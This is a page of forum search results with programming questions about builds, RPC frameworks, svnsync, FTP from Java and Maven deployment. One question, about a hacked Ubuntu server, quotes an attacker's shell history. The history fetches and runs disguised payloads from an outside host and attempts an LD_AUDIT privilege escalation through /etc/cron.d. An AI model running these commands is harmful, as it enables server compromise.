Search Results

Search found 5793 results on 232 pages for 'ftp sync'.

Page 208/232 | < Previous Page | 204 205 206 207 208 209 210 211 212 213 214 215  | Next Page >

  • Team Build Reports as "Failed" Even Though All Targets Succeeded

    - by benjy
    Hi, I've written a custom MSBuild script to be used with Team Build, as I am storing PHP in TFS and of course it isn't compiled. My custom script calls the CoreGet target to get the latest version of the files, then copies them, ZIPs them, and FTPs the ZIP archive to a testing server. All of that is working fine. The problem I am having is that despite the build succeeding - see the output in BuildLog.txt:

      Done executing task "BuildStep".
      Done building target "FTP" in project "TFSBuild.proj".
      Done executing task "CallTarget".
      Done building target "EndToEndIteration" in project "TFSBuild.proj".
      Done Building Project "C:\Documents and Settings\tfsservice\Local Settings\Temp\Code\PHP\BuildType\TFSBuild.proj" (EndToEndIteration target(s)).
      Build succeeded.
          0 Warning(s)
          0 Error(s)

    - the build log in Visual Studio still shows the build as having failed. Does anyone know how I can make it report as having succeeded? Thanks very much in advance, Benjy. P.S.: Please let me know if it would be helpful for me to post the whole build script. Thanks!

    Read the article

  • RPC for java/python with rest support, HTML monitoring and goodies

    - by Ran
    Here's my set of requirements. I'm looking for an RPC framework such as Thrift, Avro, or protobuf (with a service layer added) which supports:
    - An easy and intuitive IDL. No serial numbers, no manual versioning, simple... Avro is a good example of this.
    - Works with Java and Python.
    - Supports both a fast binary protocol and an HTTP-based RESTful style. I'd like to be able to use it for backend-to-backend communication (Java-Java or Python-Java) as well as frontend-to-backend communication (JavaScript to Java). The REST support needs to accept param=value input via GET or POST requests (configurable per request) and produce output in three possible formats: JSON, JSONP, XML.
    - Compact, fast, backward compatible, easy to upgrade, etc.
    - Provides some nice monitoring interfaces, such as JMX and web page status reports (e.g. packets in, packets out, error rate).
    - Ops friendly... no need to take the whole site down to release new versions.
    - Both sync and async communication (see the sketch below).
    - ...other goodies are welcome.
    Is there something out there? So far I've looked at Thrift and Avro and they are both nice in some ways, but neither ticks every box on my list. Thanks
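
    (To make the sync/async point concrete, here is a rough Java sketch of the kind of generated client stub I have in mind; the service and type names are hypothetical and not taken from Thrift, Avro, or protobuf.)

      import java.util.concurrent.CompletableFuture;

      // Hypothetical stub an IDL compiler might generate for a "UserService".
      public interface UserServiceClient {
          // Blocking variant for backend-to-backend calls.
          UserProfile getProfile(String userId);

          // Non-blocking variant of the same call for async callers.
          CompletableFuture<UserProfile> getProfileAsync(String userId);
      }

      // Hypothetical value object returned by the service.
      class UserProfile {
          public final String userId;
          public final String displayName;

          UserProfile(String userId, String displayName) {
              this.userId = userId;
              this.displayName = displayName;
          }
      }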

    Read the article

  • Javascript check of a form, not waiting for ajax response

    - by Y.G.J
    This is part of the validation in my form:

      function check(theform) {
          var re = /^\w[0-9A-Za-z]{5,19}$/;
          if (!re.test(theform.username.value)) {
              alert("not valid username");
              theform.username.focus();
              return false;
          }
          $.ajax({
              type: "POST",
              url: "username.asp",
              data: "username=" + theform.username.value,
              success: function (msg) {
                  username = msg;
                  if (!username) {
                      alert("username already in use");
                      return false;
                  }
              }
          });
          var re = /^\w[0-9A-Za-z]{5,19}$/;
          if (!re.test(theform.password.value)) {
              alert("not valid password");
              theform.password.focus();
              return false;
          }
      }

    Because the AJAX call is asynchronous, the function checks the username format, fires the duplicate-username request, and then jumps straight to the password check without waiting for the response. I don't want to move the rest of the code into the success handler (or readyState callback, or whatever it is), because I might move the duplicate-username check to the end, and then the function would return before the AJAX call finishes anyway. What should I do?

    Read the article

  • svnsync loses revision properties although hook is installed

    - by roesslerj
    Hello all! I have a pretty weird problem. We have set up an SVN mirror via a cron job (it has to go from inside a firewall to the outside, so no post-commit hook is possible) and svnsync. We installed a pre-revprop-change hook just as documented. Everything seems to work fine, except that it doesn't. E.g. when executing the script manually:

      # svnsync --non-interactive sync file://<path-to-mirror> --source-username <usr> --source-password <pwd>
      Committed revision 19817.
      Copied properties for revision 19817.

    No error, no complaints. But checking the revision properties gives:

      # svnlook info <path-to-mirror>
      0

      # svn info -r HEAD file://<path-to-mirror> 2>&1
      Path: <root-of-mirror>
      URL: file://<path-to-mirror>
      Repository Root: file://<path-to-mirror>
      Repository UUID: <uid>
      Revision: 19817
      Node Kind: directory
      Last Changed Rev: 19817

    So somehow the author and timestamp information gets lost, but we need that information for our internal processes. Since no error or warning is produced, I have absolutely no idea where to even start looking. Everything is local (except for the remote master), so there are no server logs to look at. Any ideas how I could approach the problem, or even better, how to solve it? Any ideas appreciated.

    Read the article

  • How to achieve high availability?

    - by tanyehzheng
    My boss wants a system that takes a continent-wide catastrophic event into account. He wants two servers in the US and two servers in Asia (one login server and one worker server on each continent). In the event that an earthquake breaks the connection between the two continents, each side should keep working on its own. When the connection is restored, they should sync with each other and get back to normal. An external cloud system is not allowed, as he has no confidence in it. The system should be designed for scalability, meaning that adding new servers should be easy to configure. The servers should be load balanced. The connection between the servers should be very secure (encrypted and sent over SSL, although SSL already takes care of the encryption). The system should let one and only one user log in with one account (beware of latency between continents: two users sharing an account may reach both login servers at the same time). Please help. I'm already at my wits' end. Thank you in advance.

    Read the article

  • FTPing a file to a mainframe using Java and Apache Commons Net

    - by SKR
    I am trying to upload a file to a mainframe server using FTP. My code is below:

      FTPClient client = new FTPClient();
      InputStream in = null;
      try {
          client.connect("10.10.23.23");
          client.login("user1", "pass123");
          client.setFileType(FTPClient.BINARY_FILE_TYPE);
          int reply = client.getReplyCode();
          System.out.println("Reply Code:" + reply);
          if (FTPReply.isPositiveCompletion(reply)) {
              System.out.println("Positive reply");
              String filename = "D:\\FILE.txt";
              in = new FileInputStream(filename);
              client.storeFile("FILE.TXT", in);
              client.logout();
              in.close(); // close the stream that was opened (the original closed an unrelated, never-assigned FileInputStream)
          } else {
              System.out.println("Negative reply");
          }
      } catch (final Throwable t) {
          t.printStackTrace();
      }

    The code gets stuck at client.storeFile("FILE.TXT", in); and I am unable to debug it. Please suggest ways / solutions.
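
    (A hunch rather than a verified fix, sketched below: storeFile() hanging forever is very often an active-vs-passive data connection problem, so switching to passive mode and inspecting the server's reply is the first thing I would try. The host, credentials, and SITE parameters are placeholders; the dataset attributes in particular are site-dependent assumptions.)

      import java.io.FileInputStream;
      import java.io.InputStream;
      import org.apache.commons.net.ftp.FTPClient;
      import org.apache.commons.net.ftp.FTPReply;

      public class MainframeFtpSketch {
          public static void main(String[] args) throws Exception {
              FTPClient client = new FTPClient();
              client.connect("10.10.23.23"); // placeholder host from the question
              if (!FTPReply.isPositiveCompletion(client.getReplyCode())) {
                  client.disconnect();
                  throw new IllegalStateException("FTP server refused connection");
              }
              client.login("user1", "pass123"); // placeholder credentials
              // Passive mode makes the client open the data connection; a common fix
              // when storeFile() blocks behind a firewall or NAT.
              client.enterLocalPassiveMode();
              client.setFileType(FTPClient.BINARY_FILE_TYPE);
              // Optional and z/OS-specific: describe the target dataset before the
              // transfer. The RECFM/LRECL/BLKSIZE values here are assumptions.
              client.sendSiteCommand("RECFM=FB LRECL=80 BLKSIZE=800");
              try (InputStream in = new FileInputStream("D:\\FILE.txt")) {
                  boolean stored = client.storeFile("FILE.TXT", in);
                  // Inspect the reply instead of assuming success.
                  System.out.println("storeFile returned " + stored + ": " + client.getReplyString());
              }
              client.logout();
              client.disconnect();
          }
      }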

    Read the article

  • XBAP Browser Control - Invoking Click event of the html Input type button

    - by maharaj
    Hi, here is what I have:
    1. An XBAP application with a WPF browser control, hosted on Page1.xaml.
    2. The XBAP runs in full trust, with the certificate installed in the client browser.
    3. Once the XBAP is loaded, the browser control is navigated to some third-party site.
    4. We are using MVVM for the XAML side.
    So, when a certain page is loaded, I attach a click event handler to the input button with id="submit" on the HTML page displayed in the browser control (I used code similar to what is in this URL: http://social.msdn.microsoft.com/Forums/en-US/wpf/thread/a4f0e4d0-78bf-44c5-a3fe-8faf2e7a0568/). It works just fine as long as I don't make a WCF web service call in my ViewModel before or after I attach this event handler. The idea is to invoke the click event for the HTML button and grab the data from the HTML page before calling the web service to save the data from the page. Here is the issue: when I make the WCF web service call (sync or async, it doesn't matter), the click event doesn't happen, but if I comment out the code for the WCF service call, the click event of the HTML input button gets invoked. Any help would be appreciated. Thanks, Salil

    Read the article

  • mvn deploy to AWS (ssh via distributionManagement)

    - by Dexter
    I am working on deploying a WAR file to AWS using Maven. I am planning to use mvn deploy, which would copy the WAR file to AWS over SSH. I am following http://maven.apache.org/plugins/maven-deploy-plugin/examples/deploy-ssh-external.html. This is my POM file:

      <project>
        ...
        <distributionManagement>
          <repository>
            <id>ssh-aws</id>
            <url>scpexe://<ec2 instance>.compute-1.amazonaws.com</url>
          </repository>
        </distributionManagement>
        <build>
          <extensions>
            <!-- Enabling the use of external SSH (scpexe) -->
            <extension>
              <groupId>org.apache.maven.wagon</groupId>
              <artifactId>wagon-ssh-external</artifactId>
              <version>1.0-beta-6</version>
            </extension>
          </extensions>
        </build>
        ...
      </project>

    This is my settings.xml:

      <server>
        <id>ssh-aws</id>
        <username>aws-user</username>
      </server>

    The only issue is that I am unable to figure out the url for the distributionManagement node of pom.xml. I am able to SSH into the AWS server with the following:

      ssh -i ~/pemfile/pemfile-key.pem aws-user@<ec2 instance>.compute-1.amazonaws.com

    But when I run mvn clean deploy, I receive this:

      Exit code: 1 - Permission denied (publickey). -> [Help 1]

    Thanks in advance.

    Read the article

  • Getting an auth token for a Dropbox account from AccountManager in Android

    - by user1490880
    I am trying to get an auth token for a Dropbox account configured on the device from AccountManager. I am using:

      accountManager.getAuthToken(account, "DROPBOX", null, Hello.this, new GetAuthTokenCallback(), null); // "account" is the Dropbox account

    I see an Allow/Deny page and click Allow, but the callback is never invoked and I never get the auth token. I did get an auth token for a Google account this way (with a different authTokenType). What am I missing? I am not sure about the authTokenType parameter for Dropbox. Also, are there any other Dropbox-specific parameters, such as the options Bundle, that I am missing? Is this approach even possible for Dropbox? Check below for the method's parameters:

      public AccountManagerFuture<Bundle> getAuthToken (Account account, String authTokenType, Bundle options, Activity activity, AccountManagerCallback<Bundle> callback, Handler handler)

    Link: http://developer.android.com/reference/android/accounts/AccountManager.html
    UPDATE: I assume that since we can create a Dropbox account under Accounts & Sync in Settings, there must be a Dropbox authenticator that implements all of the AbstractAccountAuthenticator methods, including getAuthToken(), so Dropbox should support handing out an auth token. Also, Dropbox uses OAuth 1, whereas AccountManager uses OAuth 2.0; is that an issue? Can anyone comment on this?
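
    (One thing worth checking, sketched below: the Bundle delivered to the callback can contain KEY_INTENT instead of KEY_AUTHTOKEN, which means the authenticator still needs user interaction that has to be launched explicitly. Whether that is what the Dropbox authenticator does here, and whether "DROPBOX" is even the right authTokenType, are assumptions on my part.)

      import android.accounts.AccountManager;
      import android.accounts.AccountManagerCallback;
      import android.accounts.AccountManagerFuture;
      import android.app.Activity;
      import android.content.Intent;
      import android.os.Bundle;
      import android.util.Log;

      class GetAuthTokenCallback implements AccountManagerCallback<Bundle> {
          private final Activity activity;

          GetAuthTokenCallback(Activity activity) {
              this.activity = activity;
          }

          @Override
          public void run(AccountManagerFuture<Bundle> future) {
              try {
                  Bundle result = future.getResult();
                  if (result.containsKey(AccountManager.KEY_INTENT)) {
                      // The authenticator wants more user interaction (e.g. an approval
                      // screen); the token never arrives unless this intent is started.
                      Intent intent = (Intent) result.getParcelable(AccountManager.KEY_INTENT);
                      activity.startActivity(intent);
                  } else {
                      String token = result.getString(AccountManager.KEY_AUTHTOKEN);
                      Log.d("AuthDemo", "Got auth token: " + token);
                  }
              } catch (Exception e) {
                  Log.e("AuthDemo", "getAuthToken failed", e);
              }
          }
      }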

    Read the article

  • How to eliminate tearing from animation?

    - by MusiGenesis
    I'm running an animation in a WinForms app at 18.66666... frames per second (it's synced with music at 140 BPM, which is why the frame rate is odd). Each cel of the animation is pre-calculated, and the animation is driven by a high-resolution multimedia timer. The animation itself is smooth, but I am seeing a significant amount of "tearing", or artifacts that result from cels being caught partway through a screen refresh. When I take the set of cels rendered by my program and write them out to an AVI file, and then play the AVI file in Windows Media Player, I do not see any tearing at all. I assume that WMP plays the file smoothly because it uses DirectX (or something else) and is able to synchronize the rendering with the screen's refresh activity. It's not changing the frame rate, as the animation stays in sync with the audio. Is this why WMP is able to render the animation without tearing, or am I missing something? Is there any way I can use DirectX (or something else) to make my program aware of where the current scan line is, and if so, is there any way I can use that information to eliminate tearing without actually using DirectX to display the cels? Or do I have to render fully with DirectX to deal with this problem? Update: I forgot a detail. My app renders each cel onto a PictureBox using Graphics.DrawImage. Is this significantly slower than using BitBlt, such that I might eliminate at least some of the tearing by switching to BitBlt?

    Read the article

  • Dynamic auto-updating (UI/grid-bound) binding list in C# WinForms?

    - by Dhana
    I'm not even sure if I'm doing this correctly, but basically I have a list of objects built from a class/interface, and I bind that list to a DataGridView on a Windows Form (C#). The list is a sync list that automatically updates the UI, in this case the DataGridView. Everything works fine now, but I would like the list to hold dynamic objects: each object will have two static properties by default (ID, Name), and at run time the user will select the remaining properties. These should be bound to the data grid, and any update to the list should automatically be reflected in the grid. I am aware that we can use dynamic objects, but I would like to know how to approach the solution.

      datagridview.DataSource = myData; // myData is AutoUpdateList<IPersonInfo>

    Now IPersonInfo is the type of object, and I need to add dynamic properties to this type at runtime.

      public class AutoUpdateList<T> : System.ComponentModel.BindingList<T>
      {
          private System.ComponentModel.ISynchronizeInvoke _SyncObject;
          private System.Action<System.ComponentModel.ListChangedEventArgs> _FireEventAction;

          public AutoUpdateList() : this(null) { }

          public AutoUpdateList(System.ComponentModel.ISynchronizeInvoke syncObject)
          {
              _SyncObject = syncObject;
              _FireEventAction = FireEvent;
          }

          protected override void OnListChanged(System.ComponentModel.ListChangedEventArgs args)
          {
              try
              {
                  if (_SyncObject == null)
                  {
                      FireEvent(args);
                  }
                  else
                  {
                      _SyncObject.Invoke(_FireEventAction, new object[] { args });
                  }
              }
              catch (Exception)
              {
                  // TODO: Log here
              }
          }

          private void FireEvent(System.ComponentModel.ListChangedEventArgs args)
          {
              base.OnListChanged(args);
          }
      }

    Could you help out on this?

    Read the article

  • GitHub solution for personal repo

    - by Luke Maurer
    So I've got my private SVN repo on my home server, and it has maybe 30 different modules thrown together in it, ranging from abortive throw-away larks to a few endeavors that might actually go somewhere someday. But a recent filesystem failure (BTW, never ever EVER use XFS without a battery-backed hardware RAID) has me spooked and thinking of using a DVCS for all that. I've also just had quite the swig of the Git koolaid, and I've been working with GitHub of late, so that's where I'm looking right now. Of course, it would be silly to shell out major cash for a separate private Git repo for every little project, and I don't want to have to be selective about what I throw up there (I love all my children :-D ), so I'll have to be somewhat creative about this. I can happily use SSH to my home box to use Git the way I've been using SVN, and I'm thinking from there I could amalgamate everything into, say, a big project with 30 submodules, which I then push to GitHub. What'd be a sane way to set this up? Does using submodules sound feasible? How do I sync it all to my private GitHub repo? Cron job? Git hook? I'd love to hear it if anyone's done something similar. I'm not really married to Git or GitHub, so a sufficiently compelling feature of another solution might sway me. But if your answer does involve a different system (especially a different VCS), be advised it'll be a tougher sell :-)

    Read the article

  • Achieving Thread-Safety

    - by Smasher
    Question: How can I make sure my application is thread-safe? Are there any common practices, testing methods, things to avoid, or things to look for?
    Background: I'm currently developing a server application that performs a number of background tasks in different threads and communicates with clients using Indy (which uses another bunch of automatically generated threads for the communication). Since the application should be highly available, a program crash is a very bad thing, and I want to make sure that the whole application is thread-safe. No matter what, from time to time I discover a piece of code that throws an exception that never occurred before, and in most cases I realize that it is some kind of synchronization bug where I forgot to synchronize my objects properly. Hence my question about best practices, testing of thread-safety, and things like that.
    mghie: Thanks for the answer! I should perhaps be a little more precise. Just to be clear, I know the principles of multithreading, I use synchronization (monitors) throughout my program, and I know how to tell threading problems from other implementation problems. But nevertheless, I keep forgetting to add proper synchronization from time to time. Just to give an example, I used the RTL sort function in my code; it looked something like FKeyList.Sort(CompareKeysFunc); and it turns out that I had to synchronize FKeyList while sorting. It just didn't come to mind when initially writing that simple line of code. It's these things I want to talk about. What are the places where one easily forgets to add synchronization code? How do YOU make sure that you have added sync code in all the important places?
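
    (The question is about Delphi, but the kind of omission being described is easy to show in a small Java sketch; the names below are made up for illustration. The point is simply that the sort has to take the same lock as every other access to the shared list, and that this is the line people forget.)

      import java.util.ArrayList;
      import java.util.Comparator;
      import java.util.List;

      public class KeyListSortSketch {
          private final List<String> keyList = new ArrayList<>();
          private final Object keyListLock = new Object();

          public void add(String key) {
              synchronized (keyListLock) {
                  keyList.add(key);
              }
          }

          // The easy-to-forget part: the sort must take the same lock that every
          // other access to keyList takes, otherwise another thread can mutate
          // the list mid-sort.
          public void sortKeys(Comparator<String> comparator) {
              synchronized (keyListLock) {
                  keyList.sort(comparator);
              }
          }
      }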

    Read the article

  • How to cope with null results in SQL Tasks that return single rows in SSIS 2005?

    - by JSacksteder
    In a dataflow task, I can slip a row count into the processing flow and place the count into a variable. I can later use that variable to conditionally perform some other work if the row count was 0. This works well for me, but I have no corresponding strategy for SQL tasks that are expected to return a single row. In that case, I'm returning those values into variables. If the lookup produces no rows, the SQL task fails when assigning values into those variables. I can branch on that component failing, but there's a side effect: if I'm running the job as a SQL Server Agent job step, the step returns DTSER_FAILURE, causing the step to fail. I can tell the SQL Agent to disregard the step failure, but then I won't know if I have a legitimate error in that step. This seems harder than it should be. The only strategy I can think of is to run the same query with a COUNT(*) aggregate, test whether that returns a number greater than 0, and if so run the query again without the count. That's ugly because I then have the same query in two places that I need to keep in sync. Is there a better way?

    Read the article

  • Why can't I simply copy installed Perl modules to other machines?

    - by pistacchio
    Being very new to Perl but not to dynamic languages, I'm a bit surprised at how non-straightforward module management is. Sure, cpan X does theoretically work, but I'm working on the same project from three different machines and OSes (at work, at home, and testing in an external environment). At work (Windows 7) I have problems using cpan because our firewall makes FTP unusable. At home (Mac OS X) it works. In the external environment (Linux CentOS) it worked after hours of effort, because I don't have root access and I had to configure cpan to operate as a non-root user. I've also tried another server where I have access: where the previous external environment is a VPS with shell access, this other one is a cheap shared host where I have no way to install new modules beyond the pre-installed ones. At the moment I still can't install Template under Windows. I've seen that as an alternative I could compile it, and I've also tried ActiveState's PPM, but the module isn't available there. Now, my perplexity is about Perl being a dynamic language. I've had this kind of problem when working with C, for example, where I had to compile all the libraries for each platform, but I thought that with Perl the approach would be very similar to Python's or PHP's, where in 90% of cases copying the module into a directory and importing it simply works. So, my questions: if Perl modules are written in Perl, why won't the copy/paste approach work? If some modules (or parts of them) have to be compiled, how can I see on CPAN whether a module is pure Perl or relies on compiled libraries? Isn't there a way to download the module (tar, zip...) and use cpan to deploy it? That would solve my problem under Windows.

    Read the article

  • Ubuntu Server hack [closed]

    - by haxpanel
    Hi! I looked at netstat and noticed that someone besides me is connected to the server by SSH. I looked into this because my user should be the only one with SSH access. I found this in an FTP user's .bash_history file:

      w
      uname -a
      ls -a
      sudo su
      wget qiss.ucoz.de/2010/.jpg
      wget qiss.ucoz.de/2010.jpg
      tar xzvf 2010.jpg
      rm -rf 2010.jpg
      cd 2010/
      ls -a
      ./2010
      ./2010x64
      ./2.6.31
      uname -a
      ls -a
      ./2.6.37-rc2
      python rh2010.py
      cd ..
      ls -a
      rm -rf 2010/
      ls -a
      wget qiss.ucoz.de/ubuntu2010_2.jpg
      tar xzvf ubuntu2010_2.jpg
      rm -rf ubuntu2010_2.jpg
      ./ubuntu2010-2
      ./ubuntu2010-2
      ./ubuntu2010-2
      cat /etc/issue
      umask 0
      dpkg -S /lib/libpcprofile.so
      ls -l /lib/libpcprofile.so
      LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
      ping
      gcc
      touch a.sh
      nano a.sh
      vi a.sh
      vim
      wget qiss.ucoz.de/ubuntu10.sh
      sh ubuntu10.sh
      nano ubuntu10.sh
      ls -a
      rm -rf ubuntu10.sh
      . .. a.sh .cache ubuntu10.sh ubuntu2010-2
      ls -a
      wget qiss.ucoz.de/ubuntu10.sh
      sh ubuntu10.sh
      ls -a
      rm -rf ubuntu10.sh
      wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
      rm -rf W2Ksp3.exe
      passwd

    The system is in a jail. Does that matter in this case? What should I do? Thanks, everyone! So far I have:
    - banned the connected SSH host with iptables
    - stopped the sshd in the jail
    - saved bash_history, syslog, dmesg, and the files from the wget lines in bash_history

    Read the article

  • Script to install and compile Python, Django, Virtualenv, Mercurial, Git, LessCSS, etc... on Dreamhost

    - by tmslnz
    The Story: After cleaning up my Dreamhost shared server's home folder of all the cruft accumulated over time, I decided to start afresh and compile/reinstall Python. All the tutorials and snippets I found seemed overly simplistic, assuming (or ignoring) a bunch of dependencies needed by Python to compile all modules correctly. So, starting from http://andrew.io/weblog/2010/02/installing-python-2-6-virtualenv-and-virtualenvwrapper-on-dreamhost/ (so far the best guide I found), I decided to write a set-and-forget Bash script to automate this painful process, including along the way a bunch of other things I am planning to use.
    The Script: I am hosting the script at http://bitbucket.org/tmslnz/python-dreamhost-batch/src/
    The TODOs: So far it runs fine, and does everything it needs to in about 900 seconds, giving me at the end of the process a fully functional Python / Mercurial / etc. setup without even needing to log out and back in. I thought this might be of use to others too, but there are a few things I think it is missing, and I am not quite sure how to go about them, what the best way to do them is, or whether they make sense at all:
    - Check for errors and abort
    - Check for minor version bumps of the packages and give warnings
    - Check for known dependencies
    - Use arguments to install only some of the packages instead of commenting out lines
    - Organise the code in a manner that's easy to update
    - Optionally make the installers and compilation silent, with error logging to a file
    - Fail-proof .bashrc modification, to prevent breaking SSH logins and having to log back in via FTP to fix it
    EDIT: The implied question is: can anyone, more bashful than me, offer general advice on the worthiness of the above points or highlight any problems they see with this approach? (see my answer to Ry4an's comment below)
    The Gist: I am no UNIX, Bash, or compiler expert, and this has been built iteratively, by trial and error. It is somehow going towards apt-get (well, 1% of it...), but since Dreamhost and others obviously cannot give root access on shared servers, this looks to me like a potentially very useful workaround, particularly with some community work involved.

    Read the article

  • Images not showing in ie7 using jquery cycle and jCarouselLite plugin

    - by Geetha
    Hi All, I am using the jQuery Cycle and jCarouselLite plugins to display images as a slideshow. The images are not getting displayed in IE7, but everything works perfectly in IE6. The image properties inside the Cycle control show: Protocol: Not available; Type: Not available; Address (URL): Not available; Size: Not available; Dimensions: 100x100. The control does have the URL, though; if I open that image URL on its own, the image shows. Code:

      $('#slide').cycle({
          fx: 'fade',
          continuous: true,
          speed: 7500,
          timeout: 55000,
          sync: 1
      });

    HTML code:

      <div id="slide">
          <img src="samp1.jpg" width="664" height="428" border="0" />
          <img src="samp2.jpg" width="664" height="428" border="0" />
          <img src="samp3.jpg" width="664" height="428" border="0" />
          <img src="samp4.jpg" width="664" height="428" border="0" />
          <img src="samp5.jpg" width="664" height="428" border="0" />
          <img src="samp6.jpg" width="664" height="428" border="0" />
          <img src="samp7.jpg" width="664" height="428" border="0" />
          <img src="samp8.jpg" width="664" height="428" border="0" />
      </div>

    Geetha.

    Read the article

  • Strange Sql Server 2005 behavior

    - by Justin C
    Background: I have a site built in ASP.NET with SQL Server 2005 as its database. The site is the only site on a Windows Server 2003 box sitting in my client's server room. The client is a local school district, so for data security reasons there is no Remote Desktop access and no remote SQL Server connection; if I have to service the database I have to be at the terminal. I do have FTP access to update the ASP code.
    Problem: I was contacted yesterday about an issue with the system. When I looked into it, it seems a bug that I had solved nearly a year ago had returned. I have a stored procedure that used to take an int as a parameter, but a year ago we changed the structure of the system and updated the stored procedure to take an nvarchar(10). The stored procedure had somehow changed back to taking an int instead of an nvarchar. There is an external hard drive connected to the server that copies data periodically and can restore the server in case of failure. I would have assumed that somehow an older version of the database had been restored, but data that I know was inserted 7 days and 1 day before the bug occurred is still in the database.
    Question: Is there any way that the structure of a SQL Server 2005 database can revert to a previous version, or be restored to a previous version, without touching the actual data? No one else should have access to the server, so I'm going a little insane trying to figure out how this even happened. Any ideas?

    Read the article

  • Windows Azure - access webrole local storage from separate workerrole

    - by Brett Smith
    I'm running an application on Windows Azure, and the MVC views need to be dynamic. I started by storing them as records in the database, but I'm quite keen to move them to a physical location. My plan was to create the physical files via code, which worked great and sped up page loads dramatically. This was of course before I realised that the files are only available for the duration of the role. Next I looked at a startup task that creates the files when the role is started, but then I realised that separate instances wouldn't stay in sync unless I monitored the database for changes. So I moved from a startup task to a function in the role's Run method that checks the database every 10 minutes to see whether changes have occurred. The problem is that this seems to choke the application (at least during warm-up). Ideally I would like to move the Run function to its own worker role that can sit there and push files out to the web role instances, but I'm unsure how I would go about accessing the web role's local storage from the worker role. Can anybody tell me whether this is actually possible, and hopefully point me in the right direction to achieve it? Just to clarify what I'm trying to achieve: the view is created in a user interface running on one web role and stored in the database; a separate (front-end) web role has a client-side application with a virtual path provider pointing view requests to local storage (LocalResource); and a separate worker role should create the view structure and load it into the front-end web role's local storage.

    Read the article

  • How to scale a PHP application (servers, mysql, memcache)

    - by Stéphane Goetz
    Hi, I'm currently building a website for a social project in Switzerland, and before there is an overflow of users I want to prepare the application to scale. I have answered many of the questions by myself, but some remain. Let me explain what I want to do. First, at the beginning the application will have only one server (short term) with DNS, PHP, MySQL, data, and memcache. Second, I will then split it in two: DNS, MySQL, and memcache on one server; data and PHP on the other. Third, and here is the problem, I don't know exactly how to take it from there and keep the application running well. I could do:
    - Front: load balancer, memcache, DNS
    - Web 1: PHP, data
    - Web 2: PHP, data
    - MySQL
    This would be the scheme; all PHP sessions are kept in the DB. BUT how do I sync the data? Do I run rsync to keep the copies up to date? Do I put the data on a separate (network) disk to be sure? But in that case, how do I handle user uploads? And if the website gets more successful and we have to move to a bigger infrastructure, wouldn't that create some latency on updates? Or would it be better to go directly to Amazon's web services? Some info: I use CodeIgniter as the framework, and Linux as the web server OS (distribution not chosen yet, but it should be Debian). Thanks in advance for your answers.

    Read the article

  • Editing a remote file on-the-fly with PHP

    - by user275074
    Hi, I have a requirement to edit a remote text file on the fly; its content currently stands at about 1 MB. I have tried a couple of approaches and both seem clunky or memory-hungry, which I can't rely on. Thinking through what I'm trying to achieve logically:
    1. FTP to a remote server.
    2. Download a copy of the file for backup purposes and store it somewhere locally.
    3. Open the remote file and add the necessary lines.
    4. Remove lines from the remote file according to an array of unwanted data generated on the local server.
    Is this possible? I've managed to code steps 1 and 2, but I'm having difficulty with 3 and 4. The way I'm doing it now is to use fgets and return the whole string. I really don't want to do this, as it involves manipulating and regenerating the whole string (and it's large) and then re-inserting it between two markers in the remote file. Is there no way of manipulating the lines of text in the file on the fly?

    Read the article

  • Setting up SVN/LAMP/test server on Linux, where to start?

    - by John Isaacks
    I have an Ubuntu machine set up. I installed Apache 2 and PHP 5 on it, and I can access the web server from other machines on the network via http://linux-server. I have Subversion installed on it, and I also have vsftpd installed so I can FTP to it from another computer on the network. Other users and I currently use Dreamweaver to check files in and out directly from our live site to make changes. I want to connect to the Linux server from a PC, make changes on the test server until they are ready, and then push them to the live site. I also want to work Subversion into this workflow, but I'm not sure what the best workflow is or how to set it up. I have no experience with Linux, SVN, or even using a test server; the check-in/check-out we currently do is the way I have always done it. I have already hit many snags just getting what I have set up, because of my lack of knowledge in the area. Dreamweaver 5 has Subversion integration, but I can't figure out how to get it to work. I want to set up and create the best workflow possible. I don't expect anyone to give me an answer that will enlighten me enough to know everything I need to know to do what I want to do (although if possible that would be great); instead I am looking for something like a knowledge path: a general outline of what I need to do, accompanied by links on how to do it. For example: read this book to learn Linux, then read this article to learn SVN, etc., and then you should know what to do. I would be happy just getting it all set up, but I would also like to know what I am actually doing while setting it up.

    Read the article

  • lightweight/portable VCS for server-hopping DBA?

    - by Aaron
    I'm looking for a VCS that will help me keep all of my work scripts in sync. Requirements:
    - Portable (as in flash drive, not code-level)
    - Runs on Windows XP and Server 2003+
    - No installation dependencies (Cygwin, Perl, Python)
    I use Mercurial on my work machine for version control of the various T-SQL, ksh, Perl, and CMD/BAT scripts that I maintain as an MS SQL Server DBA and Unix sysadmin. So far, hg has worked for my AIX boxes: I mount my home directory as I log in and deal with the repo as if it were local. I haven't been able to find a similar solution for the Windows machines I use. On most of them I do not have local admin rights; even if I did, I'd rather not install (and maintain) Python + Mercurial on all of them. I can't get to my home directory on them remotely, which leaves a client running on each machine as the only option. Bonus points for an answer that would let me use a single repo for both the Windows and Unix machines. :) I'm running WinXP, with heavy use of Cygwin and a CrunchBang VM.

    Read the article

  • Synchronizing in SQL Replication works when manually syncing, but not automatically

    - by Dominic Zukiewicz
    I'm using SQL Server 2005 to create a replicated copy of the main databases, so that the reports can point to the replicated copy instead of locking our main databases. I have set up the 3 databases as publications and then 3 subscribers, moving the transactions over to the subscribers (instantaneously, I hope!). What seems to be happening is that when using the "Insert Tracer" function, replication from publisher to distributor takes < 2 seconds, but replicating on to the subscribers can take over 7 minutes (and these are local databases on a SAN). This could be for 2 reasons: 1. the SQL statements used to query the database are obtaining locks which stop the transactions from updating the subscribers; or 2. the subscribers are just too busy for replication to apply the changes. What troubles me more is that although the Replication Monitor / Insert Tracer show these statistics, if you use "View Subscription Details" and then click Start, it syncs within seconds. My goal is to have the data syncing (ideally) continuously, or every minute; perhaps I should reduce the batch size of the transactions? What am I doing wrong? [Note that the -Continuous flag is set!]

    Read the article
